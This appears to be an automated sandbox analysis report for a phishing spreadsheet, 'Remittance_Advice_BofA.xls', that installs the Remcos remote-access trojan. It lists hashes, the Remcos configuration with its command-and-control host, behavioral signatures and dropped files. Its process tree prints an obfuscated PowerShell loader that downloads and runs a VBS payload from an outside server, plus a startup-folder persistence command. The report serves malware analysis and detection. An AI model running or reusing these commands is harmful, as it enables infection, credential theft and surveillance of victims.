Analysis

  • max time kernel
    209s
  • max time network
    207s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    16-08-2022 20:38

General

  • Target

    Remittance_Advice_BofA.xls

  • Size

    129KB

  • MD5

    ef647821a5b83276209b316934bad8ab

  • SHA1

    1e01b86c162aad282434c34d13147dd404e8d59a

  • SHA256

    adbbd78d5c79c11d3e5f723085b3d5d3fb2a34047a3e2a8791cdd764b78b08f7

  • SHA512

    a2d6cb284376ac52fbeaf895b85e7924b17248b4af8b057c5c24990430963aa0a04a427a3aa2634e4d8594579c23411afa5bbc446933f2fee2bf65dd60e4f55c

Malware Config

Extracted

Family

remcos

Botnet

Aug

C2

topboysully.dvrlists.com:10171

Attributes
  • audio_folder

    MicRecords

  • audio_path

    %AppData%

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • install_path

    %AppData%

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • keylog_path

    %AppData%

  • mouse_option

    false

  • mutex

    Aug-MR3KZU

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    Remcos

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Nirsoft 3 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 30 IoCs
  • Modifies registry class 3 IoCs
  • NTFS ADS 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 46 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 17 IoCs
  • Suspicious use of WriteProcessMemory 37 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Remittance_Advice_BofA.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Modifies registry class
    • NTFS ADS
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1280
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\rkWwH.js"
      2⤵
      • Process spawned unexpected child process
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:5064
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference = 'SilentlyContinue' ;$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.ew\''+pmet:vne$,''sbv.enixam/31.02.721.902//:ptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\we.vbs');remove-item ($env:appdata + '\rkWwH.js')
        3⤵
        • Blocklisted process makes network request
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1708
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\we.vbs"
          4⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:4696
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [long binary-encoded PowerShell command line omitted]
            5⤵
            • Blocklisted process makes network request
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:5040
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              6⤵
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of WriteProcessMemory
              PID:3172
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\xrdxquuntc"
                7⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:4600
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\zljqrmfhhleca"
                7⤵
                • Accesses Microsoft Outlook accounts
                PID:1048
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\knwajeqivtwhclzwf"
                7⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4956
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-item 'C:\Users\Admin\AppData\Local\Temp\we.vbs' -Destination 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\we.vbs'
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4868
  • C:\Program Files (x86)\Internet Explorer\ielowutil.exe
    "C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding
    1⤵
    PID:1416
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
      1⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:5092
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5092 CREDAT:17410 /prefetch:2
        2⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:4084

    Network

    MITRE ATT&CK Matrix ATT&CK v6

      • Defense Evasion: Modify Registry (1) T1112
      • Credential Access: Credentials in Files (1) T1081
      • Discovery: Query Registry (3) T1012
      • Discovery: System Information Discovery (4) T1082
      • Collection: Data from Local System (1) T1005
      • Collection: Email Collection (1) T1114

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      3KB

      MD5

      556084f2c6d459c116a69d6fedcc4105

      SHA1

      633e89b9a1e77942d822d14de6708430a3944dbc

      SHA256

      88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

      SHA512

      0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

    • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\z2evvp3\imagestore.dat
      Filesize

      30KB

      MD5

      d9d0543f39ef0a7b9ad04402b1ab8bcc

      SHA1

      fa5b074f4bf4a3bc2763da85f85def62d2709e1b

      SHA256

      d48719250efd24778cc15f7c96972f1cd9a7f57e3a4f1d0cb1a04c016160e9cd

      SHA512

      b13ad5db6666a8317a75b5de6088b071f190ace89c1cb3e539ffa07e92dc887dbe7927a22f17cefeed29383f61233bd0ae48a82446911895f745a3834d1d0f4f

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      2247453c28acd1eb75cfe181540458a8

      SHA1

      851fc5a9950d422d76163fdc6a453d6859d56660

      SHA256

      358b8df2d92a70274c5ec8e50bf6353c37a7fe1855fd9659f610f8a96eac19bd

      SHA512

      42475e640ee70ab4bd7350dbd970c5862f1597918b6a5e3ee038a10a5c5b883ac61038ecec51a7bfe7cb615798d832fae4a3ead9571f35825a644dee1f2dd7d3

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      a854d979ef8da9302b9bd0c4d98ed8bd

      SHA1

      bf6ab378ca14e07095d701b757d7e88ebae2f944

      SHA256

      e93b4e8f3f4bdee8d5bbfcfa79f12e90d5cdc060859ce9326bb40db2c9c34a8e

      SHA512

      c6961f80db242ece9fa69761d5dfa5c8bd3194857d11d2f8300fdbb7cb9b6ff0765d2e4de715b6a31492e5a04f80619113c6e63cef747e802888c83cd9019caf

    • C:\Users\Admin\AppData\Local\Temp\0b11dad3-e15c-4937-b805-b2895dc6b4e7\AgileDotNetRT64.dll
      Filesize

      75KB

      MD5

      42b2c266e49a3acd346b91e3b0e638c0

      SHA1

      2bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1

      SHA256

      adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29

      SHA512

      770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81

    • C:\Users\Admin\AppData\Local\Temp\we.vbs
      Filesize

      2KB

      MD5

      b53758dd50ce606eaa76ab0c58ae4b34

      SHA1

      6e7b58e1b6211b2985de1b025bb98a4ec1bfc733

      SHA256

      efc8b02481aee3a35928036674d959f24cc05eea59a9dff66a3962474b7a57c0

      SHA512

      46ea6773fbb07d12987855575f5b865e55a3832ac0343a6d24816333454069bf98276192859a6fcb2e88c4ed3b0f6ac62c787a4faf5c87fc2afe1f794e4b4053

    • C:\Users\Admin\AppData\Local\Temp\xrdxquuntc
      Filesize

      4KB

      MD5

      d06ebab8b0513f602e535079a9ebbeea

      SHA1

      d29472e6eb5a72f0353d70b97a33337b255b487e

      SHA256

      0c9e16830ccc6495def187adde2137ac07a566e1534e5714f626dcd68d28094c

      SHA512

      002df6f401950fd24d5976a47c58e9e2c58cef7d4fdec69f815fb6a00fb1e1a8963a4a7bf52056e61d6f6875edec393c466742c3031dd5f88802b45ddadca209

    • C:\Users\Admin\AppData\Roaming\rkWwH.js
      Filesize

      695B

      MD5

      958e7511e960acbe7f862384301d972d

      SHA1

      cb053892de113da9568f71ed9e0cde281ec1d8bd

      SHA256

      4470c999e598819193ab3e7fd01398d9051f9009a78c4ad3b2230fb6686614b6

      SHA512

      8a1c1a239b96737787a4934bc9edd3484efb41be5fce2d576220c8a8bd438d138866ba446986bd0b13958b1513f964106fc36038c8a9394780b2482ff78a2f10

    • memory/1048-167-0x0000000000000000-mapping.dmp
    • memory/1048-169-0x0000000000400000-0x0000000000457000-memory.dmp
      Filesize

      348KB

    • memory/1280-139-0x00000162E5EF2000-0x00000162E5EF4000-memory.dmp
      Filesize

      8KB

    • memory/1280-132-0x00007FFA46370000-0x00007FFA46380000-memory.dmp
      Filesize

      64KB

    • memory/1280-138-0x00007FFA43E70000-0x00007FFA43E80000-memory.dmp
      Filesize

      64KB

    • memory/1280-137-0x00007FFA43E70000-0x00007FFA43E80000-memory.dmp
      Filesize

      64KB

    • memory/1280-136-0x00007FFA46370000-0x00007FFA46380000-memory.dmp
      Filesize

      64KB

    • memory/1280-135-0x00007FFA46370000-0x00007FFA46380000-memory.dmp
      Filesize

      64KB

    • memory/1280-148-0x00000162E5EF2000-0x00000162E5EF4000-memory.dmp
      Filesize

      8KB

    • memory/1280-133-0x00007FFA46370000-0x00007FFA46380000-memory.dmp
      Filesize

      64KB

    • memory/1280-134-0x00007FFA46370000-0x00007FFA46380000-memory.dmp
      Filesize

      64KB

    • memory/1708-142-0x0000000000000000-mapping.dmp
    • memory/1708-147-0x00007FFA5DE80000-0x00007FFA5E941000-memory.dmp
      Filesize

      10.8MB

    • memory/1708-144-0x00007FFA5DE80000-0x00007FFA5E941000-memory.dmp
      Filesize

      10.8MB

    • memory/1708-143-0x0000023378B90000-0x0000023378BB2000-memory.dmp
      Filesize

      136KB

    • memory/3172-161-0x0000000000400000-0x000000000047E000-memory.dmp
      Filesize

      504KB

    • memory/3172-158-0x0000000000400000-0x000000000047E000-memory.dmp
      Filesize

      504KB

    • memory/3172-159-0x0000000000431BE8-mapping.dmp
    • memory/3172-173-0x0000000000400000-0x000000000047E000-memory.dmp
      Filesize

      504KB

    • memory/3172-162-0x0000000000400000-0x000000000047E000-memory.dmp
      Filesize

      504KB

    • memory/3172-164-0x0000000000400000-0x000000000047E000-memory.dmp
      Filesize

      504KB

    • memory/4600-171-0x0000000000400000-0x0000000000478000-memory.dmp
      Filesize

      480KB

    • memory/4600-166-0x0000000000000000-mapping.dmp
    • memory/4696-145-0x0000000000000000-mapping.dmp
    • memory/4868-154-0x00007FFA5D230000-0x00007FFA5DCF1000-memory.dmp
      Filesize

      10.8MB

    • memory/4868-150-0x0000000000000000-mapping.dmp
    • memory/4956-168-0x0000000000000000-mapping.dmp
    • memory/4956-170-0x0000000000400000-0x0000000000424000-memory.dmp
      Filesize

      144KB

    • memory/5040-165-0x00007FFA5D230000-0x00007FFA5DCF1000-memory.dmp
      Filesize

      10.8MB

    • memory/5040-157-0x00007FFA56700000-0x00007FFA5684E000-memory.dmp
      Filesize

      1.3MB

    • memory/5040-155-0x00007FFA5D230000-0x00007FFA5DCF1000-memory.dmp
      Filesize

      10.8MB

    • memory/5040-149-0x0000000000000000-mapping.dmp
    • memory/5064-140-0x0000000000000000-mapping.dmp